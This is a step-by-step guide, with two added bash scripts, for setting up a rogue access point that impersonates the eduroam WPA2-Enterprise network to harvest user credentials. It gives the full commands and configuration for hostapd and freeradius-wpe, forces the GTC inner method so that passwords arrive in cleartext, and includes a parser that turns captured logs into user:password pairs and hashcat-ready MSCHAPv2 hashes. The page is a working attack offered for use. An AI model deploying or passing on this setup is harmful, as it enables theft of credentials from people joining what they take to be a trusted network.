RogueAP

A RogueAP is an unauthorized access point set up for malicious purposes. The one built here impersonates a WPA2-Enterprise network (the example uses the eduroam SSID) so that the credentials of clients that connect to it can be captured.

Necessary software: hostapd and freeradius-wpe (FreeRADIUS with the Wireless Pwnage Edition patch, which logs the inner-EAP credentials it receives):

apt-get install hostapd freeradius-wpe

Then, stop the services that would otherwise grab the interface (NetworkManager, wpa_supplicant) and bring the card up by hand. hostapd switches the interface to AP mode itself through nl80211, so monitor mode is not what makes the attack work; the airmon-ng check kill step is the one that matters:

airmon-ng check kill

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up

Then, raise the transmit power so the rogue AP is the strongest signal and clients prefer it. The driver enforces the regulatory limit of the current country (the hostapd config below sets ES, where 2.4 GHz is capped at 20 dBm), so a request for 28 dBm may be rejected; check the applied value with iwconfig wlan0 afterwards:

ifconfig wlan0 down

iwconfig wlan0 txpower 28

ifconfig wlan0 up

Then, configure FreeRadius-wpe:

nano /etc/freeradius-wpe/3.0/mods-enabled/eap

In the peap { } block of that file (around line 790 in the stock configuration), change the inner method:

Change default_eap_type = mschapv2 to default_eap_type = gtc

With GTC as the inner method the supplicant sends its password in clear text inside the TLS tunnel, and because the rogue server terminates that tunnel, freeradius-wpe writes the username and password to /var/log/freeradius-wpe/freeradius-server-wpe.log. Not every supplicant accepts GTC; clients that keep using MSCHAPv2 still leave a challenge/response pair in the same log, which can be cracked offline.

After that, create the self-signed certificate the RADIUS server will present during the TLS handshake, with the desired name in the CN. Only clients that do not validate the server certificate, or whose users accept the warning, will continue past this point:

cd /etc/freeradius-wpe/3.0/certs/

mkdir example-cert

cd example-cert

openssl genrsa -out server.key 2048

openssl req -new -key server.key -out server.csr -subj "/CN=example.com"

openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.pem

Now point the eap module at the private key and certificate (the two lines live in the tls-config tls-common { } block of the same file):

nano /etc/freeradius-wpe/3.0/mods-enabled/eap

private_key_file = /etc/freeradius-wpe/3.0/certs/example-cert/server.key
certificate_file = /etc/freeradius-wpe/3.0/certs/example-cert/server.pem

Now, configure HostAPD:

Create a configuration file in the hostapd directory that describes the access point and its authentication against the RADIUS server. Example (the ssid is set to eduroam, the network being impersonated):

nano rogueAP

# Radio: the AP runs on wlan0 through the nl80211 driver, channel 6 (2.4 GHz)
interface=wlan0
driver=nl80211
country_code=ES
# Log all hostapd modules to stdout at the most verbose level
logger_stdout=-1
logger_stdout_level=0
# 802.1X: hand EAP to the RADIUS server (freeradius-wpe) on localhost
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
# Must equal the client secret in freeradius-wpe's clients.conf
auth_server_shared_secret=testing123
# WPA2-Enterprise (RSN) with CCMP, so clients see a normal eduroam network
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
rsn_pairwise=CCMP
ssid=eduroam
channel=6

Note that the auth_server_shared_secret parameter is the secret shared between the RADIUS server and its client (hostapd in this case). It must match the secret in the corresponding client { } entry of /etc/freeradius-wpe/3.0/clients.conf; the stock localhost entry uses testing123, which is why the config above sets auth_server_shared_secret=testing123. If the two differ, the server drops hostapd's requests and nothing ever reaches the log.
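The following script is an added example, not code from the original page: it generates the rogueAP file above from parameters and checks that its auth_server_shared_secret agrees with the secret freeradius-wpe has for that client in clients.conf, since a mismatch is the usual reason the log stays empty. The clients.conf it builds for the demo is constructed; the paths assume Kali's /etc/freeradius-wpe/3.0 layout.

```bash
#!/bin/bash
# Added example, not code from the original page: build the hostapd rogue-AP
# config from parameters and check that its auth_server_shared_secret is the
# same secret freeradius-wpe has for that client in clients.conf. A mismatch
# makes the RADIUS server drop hostapd's Access-Requests, so nothing is logged.
# Paths assume Kali's /etc/freeradius-wpe/3.0 layout.
set -u

# gen_hostapd_conf IFACE SSID CHANNEL SECRET  -> hostapd config on stdout
# (same settings as the page's rogueAP file, parameterised)
gen_hostapd_conf() {
    local iface="$1" ssid="$2" channel="$3" secret="$4"
    cat <<EOF
interface=${iface}
driver=nl80211
country_code=ES
logger_stdout=-1
logger_stdout_level=0
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=${secret}
auth_algs=3
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
rsn_pairwise=CCMP
ssid=${ssid}
channel=${channel}
EOF
}

# clients_conf_secret CLIENTS_CONF CLIENT_NAME -> the secret inside "client NAME { ... }"
clients_conf_secret() {
    local conf="$1" name="$2"
    awk -v want="$name" '
        $1 == "client" && $2 == want { inblock = 1; next }
        inblock && $1 == "}"          { inblock = 0 }
        inblock && /^[ \t]*secret[ \t]*=/ {
            line = $0
            sub(/^[ \t]*secret[ \t]*=[ \t]*/, "", line)   # drop "secret ="
            sub(/[ \t]*(#.*)?$/, "", line)                # drop trailing comment/space
            print line
            exit
        }' "$conf"
}

# check_shared_secret HOSTAPD_CONF CLIENTS_CONF CLIENT_NAME -> 0 if they agree, 1 if not
check_shared_secret() {
    local hconf="$1" cconf="$2" name="$3" ap_secret rad_secret
    ap_secret=$(sed -n 's/^auth_server_shared_secret=//p' "$hconf")
    rad_secret=$(clients_conf_secret "$cconf" "$name")
    if [ -z "$ap_secret" ] || [ -z "$rad_secret" ]; then
        echo "could not read a shared secret from both files" >&2
        return 1
    fi
    if [ "$ap_secret" != "$rad_secret" ]; then
        echo "MISMATCH: hostapd has '$ap_secret', clients.conf ($name) has '$rad_secret'" >&2
        return 1
    fi
    echo "OK: shared secret for client '$name' matches"
}

# Stand-alone demo against a constructed clients.conf (the stock FreeRADIUS
# file ships a "client localhost" entry whose secret is testing123).
demo() {
    local tmp rc
    tmp=$(mktemp -d)
    cat >"$tmp/clients.conf" <<'EOF'
client localhost {
    ipaddr = 127.0.0.1
    secret = testing123
    require_message_authenticator = no
}
EOF
    gen_hostapd_conf wlan0 eduroam 6 testing123 >"$tmp/rogueAP"
    check_shared_secret "$tmp/rogueAP" "$tmp/clients.conf" localhost
    rc=$?
    rm -rf "$tmp"
    return "$rc"
}
demo
```

On a real box, run check_shared_secret rogueAP /etc/freeradius-wpe/3.0/clients.conf localhost before starting hostapd; the awk parser only looks inside the named client block, so a secret in some other entry does not produce a false match.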

Now the attack can be executed, using three terminals:

In the first, start the RADIUS server in the foreground (use -X instead of -f for full debug output, including each EAP exchange): freeradius-wpe -f

In the second, bring up the access point with the file created above: hostapd rogueAP

In the third, create the log file in case no client has authenticated yet, then follow it: touch /var/log/freeradius-wpe/freeradius-server-wpe.log and finally tail -f /var/log/freeradius-wpe/freeradius-server-wpe.log
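The script below is an added example, not code from the original page: it turns the entries tail -f shows into something usable, cleartext user:password pairs for GTC records and hashcat -m 5500 (NetNTLMv1) lines for clients that stayed on MSCHAPv2. The record layout it parses (a "mschap:" or "gtc:" header line followed by indented username/challenge/response or password lines) is assumed from freeradius-wpe's logger, and the sample log with its hex values is constructed for the demo.

```bash
#!/bin/bash
# Added example, not code from the original page: extract credentials from a
# freeradius-wpe log. Assumption: each record starts with "mschap: <date>" or
# "gtc: <date>" followed by indented "username:", "challenge:", "response:"
# (MSCHAPv2) or "password:" (GTC) lines, which is the layout freeradius-wpe's
# logger writes; the sample log and its hex values below are constructed.

# wpe_to_hashcat [LOGFILE]  (reads stdin when no file is given)
#   mschap records -> hashcat -m 5500 / NetNTLMv1 lines:  user::::response:challenge
#   gtc records    -> cleartext lines:                    user:password
wpe_to_hashcat() {
    awk '
        function hexstrip(s) { gsub(/:/, "", s); return s }   # aa:bb:cc -> aabbcc
        function flush() {
            if (kind == "mschap" && user != "" && chal != "" && resp != "")
                print user "::::" hexstrip(resp) ":" hexstrip(chal)
            else if (kind == "gtc" && user != "")
                print user ":" pass
            kind = user = chal = resp = pass = ""
        }
        /^(mschap|gtc): /   { flush(); kind = $1; sub(/:$/, "", kind); next }
        /^[ \t]+username:/  { user = $2 }
        /^[ \t]+challenge:/ { chal = $2 }
        /^[ \t]+response:/  { resp = $2 }
        /^[ \t]+password:/  { sub(/^[ \t]+password:[ \t]*/, ""); pass = $0 }  # keep spaces
        END { flush() }
    ' "${1:--}"
}

# Constructed sample log in the assumed layout (values are made up, not real hashes).
sample_log() {
    cat <<'EOF'
mschap: Tue Jan 12 15:03:11 2021
    username: alice@example.com
    challenge: 5c:d1:5e:3c:7d:a2:f4:44
    response: cb:fe:92:2a:19:13:6d:26:5b:03:8a:ae:4a:6c:26:da:64:97:3f:90:a8:50:0f:e1

gtc: Tue Jan 12 15:05:00 2021
    username: bob@example.com
    password: Winter 2021!

EOF
}

# Stand-alone demo. Against a live capture:
#   wpe_to_hashcat /var/log/freeradius-wpe/freeradius-server-wpe.log > creds.txt
sample_log | wpe_to_hashcat
```

The MSCHAPv2 lines can be fed straight to hashcat -m 5500 (or to asleap with the challenge and response split back out); the GTC lines need no cracking, which is the whole point of the default_eap_type = gtc change above.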
